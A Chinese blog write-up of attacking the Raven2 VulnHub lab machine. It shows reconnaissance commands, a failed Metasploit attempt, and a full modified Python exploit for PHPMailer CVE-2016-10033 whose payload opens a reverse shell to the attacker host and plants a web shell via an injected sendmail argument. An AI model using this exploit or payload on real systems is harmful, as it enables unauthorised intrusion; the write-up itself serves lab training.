raven2靶机渗透

最新推荐文章于 2024-04-24 10:33:16 发布
最新推荐文章于 2024-04-24 10:33:16 发布
阅读量213 收藏
点赞数
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51214674/article/details/133870807
版权

一、环境搭建

1.准备工具

kali

raven靶机:链接:https://download.vulnhub.com/raven/Raven2.ova

2.安装revan

该虚拟机默认是NAT模式,因此无需调整网络模式

raven MAC地址:00:0c:29:fe:97:2b

二.渗透过程

1.信息收集

探测raven的地址

  • 查看kali IP:192.168.17.129,确定raven网段:192.168.17.0
ip a

image-20230804194453573

  • //扫描与kali在同一网段的所有主机IP及对应Mac地址
sudo arp-scan -l

image-20231013161842936

确定raven地址为192.168.17.141

扫描raven 开放端口

nmap -sV -p- 192.168.17.141

-sV 扫描目标主机端口上运行的软件信息

-p- 扫描全部端口0-65535

image-20231013162231564

端口协议
22ssh
80http

url=192.168.17.141访问看看

image-20231013162450194

网页信息收集

  • 查看站点信息
sudo whatweb -v 192.168.17.141

image-20231013164315142

先放着

  • dirsearch工具扫目录
dirsearch -u 192.168.17.169 -e *

image-20231013164521583

没啥用

sudo dirb http://192.168.17.141

image-20231013202514215

url:http://192.168.17.141/vendor/PATH

image-20231013202720127

绝对路径:/var/www/html/vendor/

flag1

image-20231013203045314

5.2.16版本的PHPMailer

2.漏洞查找利用

image-20231013164404281

发现有框架漏洞

漏洞查找

  • metasploit工具利用

打开msf工具,搜索drupal漏洞

msfconsole
search JQuery

image-20231013164836664

发现JQuery许多框架,选择利用漏洞等级最高且最新的18年的漏洞exploit/unix/webapp/jquery_file_upload

漏洞利用

use exploit/unix/webapp/jquery_file_upload 
show options

image-20231013165140193

Current Setting是目前设置的内容

Required表示是否需要设置内容,yes为必须设置,no可以设置也可不设置

就上面来说RHOSTS需要set,但是没有内容

  • 所以接着设置一下RHOSTS内容(就是攻击目标IP地址,靶场地址
set RHOSTS 192.168.17.141
run

image-20231013171425610

失败

3. phpmaile漏洞

searchsploit phpmailer

image-20231013205454463

PHPMailer < 5.2.18 - 远程代码执行 - PHP Web 应用程序漏洞利用 (exploit-db.com)

image-20231013210950892

简单修改一下exp:

a.顶部加上# -- coding: utf-8 --声明,否则注释里一大堆非ASCII字符会报错。

b.修改target为靶机IP地址,利用文件为contact.php。

c.修改后门文件路径名称。也不知道为什么,用默认的backdoor.php总是利用不成功,把payload改成shell.php最终利用成功。

d. 修改反弹shell的地址为nc监听服务器的ip(KALI主机IP)和端口。

image-20231013214400894

"""
# -*- coding: utf-8 -*-
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033

Description:
Exploiting PHPMail with back connection (reverse shell) from the target

Usage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py

Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU

Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""

from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh

os.system('clear')
print("\n")
print(" █████╗ ███╗   ██╗ █████╗ ██████╗  ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║     ██║   ██║██║  ██║█████╗  ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗")
print("██║  ██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║")
print("╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝")
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")

target = 'http://192.168.17.141/contact.php'
backdoor = '/shell.php'

payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.17.129\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
fields={'action': 'submit',
        'name': payload,
        'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server\" @protonmail.com',
        'message': 'Pwned'}

m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')

headers={'User-Agent': 'curl/7.47.0',
         'Content-Type': m.content_type}

proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}


print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(),
                  headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    print('[+]  ExPLoITeD ' + target)

python3 40974.py

image-20231013211725938

访问contact.php(http://192.168.17.141/contact.php),此时就会生成后门文件shell.php

接着访问后门文件:http://192.168.1.12/shell.php

开启nc服务器监听,在服务器上得到反弹shell

nc -lvvp 4444

image-20231013213613412

失败

§666§
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Raven2靶机练习
SYJ_361的博客
03-27 1251
本文是对Raven2靶机的练习,通过phpmailer**CVE-2016-10033远程代码执行漏洞利用**进行反弹shell,通过控制mysql,对靶机权限进行提权,最后得到靶机里面的flag文件
【学渗透靶机——Raven2(mysql-udf提权)】
jieli0901227的博客
06-17 412
既然有数据库,还有之前有个wordpress 的blog ,那么查找一下数据库配置文件,浏览完页面没有发现什么, 发现blog 是个wordpress CMS,有个搜索,尝试注入,使用sqlmap 跑了一下,没跑成功;主机开放有22,80,111,39169端口 ,22端口没有收集到账号密码信息,那么暴力ssh 消耗时间成本太大,,优先80端口。nmap漏洞探测没有发现可利用的漏洞信息,只有网站的路径枚举信息,,我们留着,后面查看。查看一下wordpress 的版本,已经限制,不能查看版本。
Raven2--靶机实操详解
qq_61802750的博客
10-14 602
​ 进入wordpress目录,有对应的配置文件wp-config.php,我们打开可以看到数据库密码。这时,服务名、版本号都有了,我们可以进行漏洞利用了。​ 既然我们找到mysql版本,我们就可以考虑使用mysql UDF 提权。​ 访问之后,会在后台生成shell文件,我们访问shell.php文件。​ 可以看到,靶机开放了22、80、111端口,我们优先访问80端口。​ 我们再次用python搭建简单的服务器,把文件下载到靶机里面。​ 找到靶机的ip之后,我们使用nmap扫描靶机的端口。
Raven2掠夺者2》 PC端一键下载+预约注册教程
最新发布
weixin_62825745的博客
04-24 807
不过,网石介绍说,这次的新作不是动作RPG,而是正在开发中的全新大型MMORPG,继承了独特的黑暗奇幻世界观。进入官网后,只需要选择PC端后,输入手机号码,勾选【必填】项,完成上述操作后,点击【预登记】,即可完成登记注册。查看奇游,只需要在奇游上查看《Raven 2掠夺者2》并启用优化,即可让玩家们在游戏过程中稳定游玩。玩家们可以在下载好的游戏启动器中,勾选同意服务协议后,点击【PC版本预约注册】可以进行预约注册。玩家们在奇游中启用优化后,点击详细页面,即可点击一键下载。注意,最好下载到全英文路径中~
Raven2渗透测试
weixin_56537388的博客
06-13 271
查看wp-config.php文件,发现什么都没有,打开wp-login.php,发现url由我们输入的ip地址变成了raven.local我们需要做的是配置电脑的hosts文件使域名解析到我们的kali主机ip地址。靶机下载地址:链接:https://pan.baidu.com/s/1z2uHZHtn4FROnf_av-2voA。发现目录主要由三部分构成:manual,wordpress,vendor,分别进行访问。可以看到,除了默认的1,2,254,那么192.168.182.132就是目标ip。
Vulnhub系列靶机---Raven2
qq_45953122的博客
10-13 781
用nc开启监听并访问http://192.168.160.47/sky.php 获得一个低级的shell。浏览器访问http://192.168.160.47/contact.php生成后门文件。需要提权,chmod修改权限后,再./LinEnum.sh执行。此时,/usr/bin/find 就具备了SUID 权限。
oscp推荐的训练靶机raven2渗透过程
07-05
OSCP 训练靶机 Raven2 渗透过程详解 OSCP( Offensive Security Certified Professional)是 Offensive Security 公司提供的渗透测试认证,旨在验证个人的渗透测试技能。Raven2 是 OSCP 认证考试中的一个训练靶机,...
Raven:Javascript框架
05-05
掠夺Raven是一个创造性的编码框架,在Javascript环境中结合了在openFrameworks,Processing和Flash中看到的意识形态。 类按类型分开,因此可以轻松选择项目中需要框架的哪些部分。 虽然仍处于青春期,但正在进行重大...
raven
03-07
通过键入以下命令来git clone https://github.com/icebox827/raven 在终端中运行bundle install 在终端中运行db:create以创建数据库在终端中运行db:migrate以迁移数据库rails s 开始添加用户并创建事件现场演示技术...
Rraven:将R与Raven集成
04-28
拉文 Rraven软件包旨在促进R和()之间的数据交换。 提供了非常强大的工具来分析(动物)声音。 R可以简化复杂分析程序的自动化过程。 此外,R包(如 , 和 (以及其他))提供了其他分析方法,可作为发现的软件包...
Raven
10-25
Raven
Raven: 2靶机入侵
weixin_30477797的博客
01-30 959
0x00 前言 Raven 2是一个中等难度的boot2root虚拟靶机。有四个flag需要找出。在多次被攻破后,Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵。 靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova 0x01 存活主机 1.在windows上的scan ports工具对目标整个网段(...
Vulnhub: Raven 2 靶场渗透实战 Walkthrough By V.K.R(上)
weixin_52641450的博客
10-30 769
raven2 靶场 walkthrough by V.K.R
vulnhub之raven2
weixin_54431413的博客
07-01 498
phpmailer漏洞利用,需要根据实时情况修改exp,udf提权: 拷贝kali自带的链接库文件,创建表,将链接库文件写入到表中,造成表里dump到对应路径中,之后创造自定义函数,利用自定义函数执行操作系统命令,这个mysql属主是root,成功提权。...
vulnhub靶场,Raven2
kukudeshuo的博客
07-19 1308
vulnhub靶场,Raven2 环境准备 攻击机:kali(192.168.58.130) 靶机Raven2(192.168.58.157) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80、111、56784 浏览器访问目标靶机80端口 就是一个非常普通的页面,没有啥好利用的 网站目录结构扫描 dirb http://19
【VulnHub】Raven: 2靶机渗透测试
大方子
06-28 4034
总结和思考: 使用netdiscover探测内网存活主机 PHPMailer的漏洞反弹得到shell Python版的EXP修改 查看wordpress的wp-config.php配置文件得到数据库账号密码 MySQL版本 <= 7.14 5.6.32 5.5.51 可以利用UDF提权 KALI对EXP的编译 给程序chmod u+s 增加suid权限,可以以root权限运...
VulnHub-Raven:2靶机渗透
ce666666的博客
02-04 3819
前言 通过VulnHub-Raven:2靶机渗透学习 攻击机:kali 靶机:Raven 网段:192.168.123.0/24 知识点: PHPMailer 小于5.2.18 (CVE-2016-10033) UDF提权 工具: LinEnum——Linux枚举漏洞工具 dirsearch——目录扫描工具 CVE-2016-10033 原理:PHPMailer mail()函数功能,远程攻击者利用默认开启的PHPMailer可以运行构造的恶意代码,无需登录触发该漏洞,从而导致获取系统权限。
No.3-VulnHub-Raven: 2-Walkthrough渗透学习
qq_34801745的博客
12-29 1996
** VulnHub-Raven: 2-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 靶机难度:中等(CTF) 靶机发布日期:2018年5月4日 靶机描述:Raven:2是中级boot2root VM。有四个要捕获的标志。在多次破坏之后,Raven Security采取了额外的措施来加固其Web服务器,以防止黑...
vulnhub raven2
mrwangtw的博客
03-15 3653
nmap主机发现 端口扫描 进入80端口,gobuster扫描 进入vendor目录 搜集信息,得到 搜索相关的漏洞 使用这个payload,更改配置信息 直接运行即可,然后访问contact页面即可在服务器上生成exp的php文件,然后主机开启监听4444端口,访问exp页面即可得到shell 查看配置信息 登录mysql,这里没有思路,看大佬的博客发现可以直接搜索mysql的漏洞 使用的是CVE-2016-6662的漏洞 这...
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

§666§

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值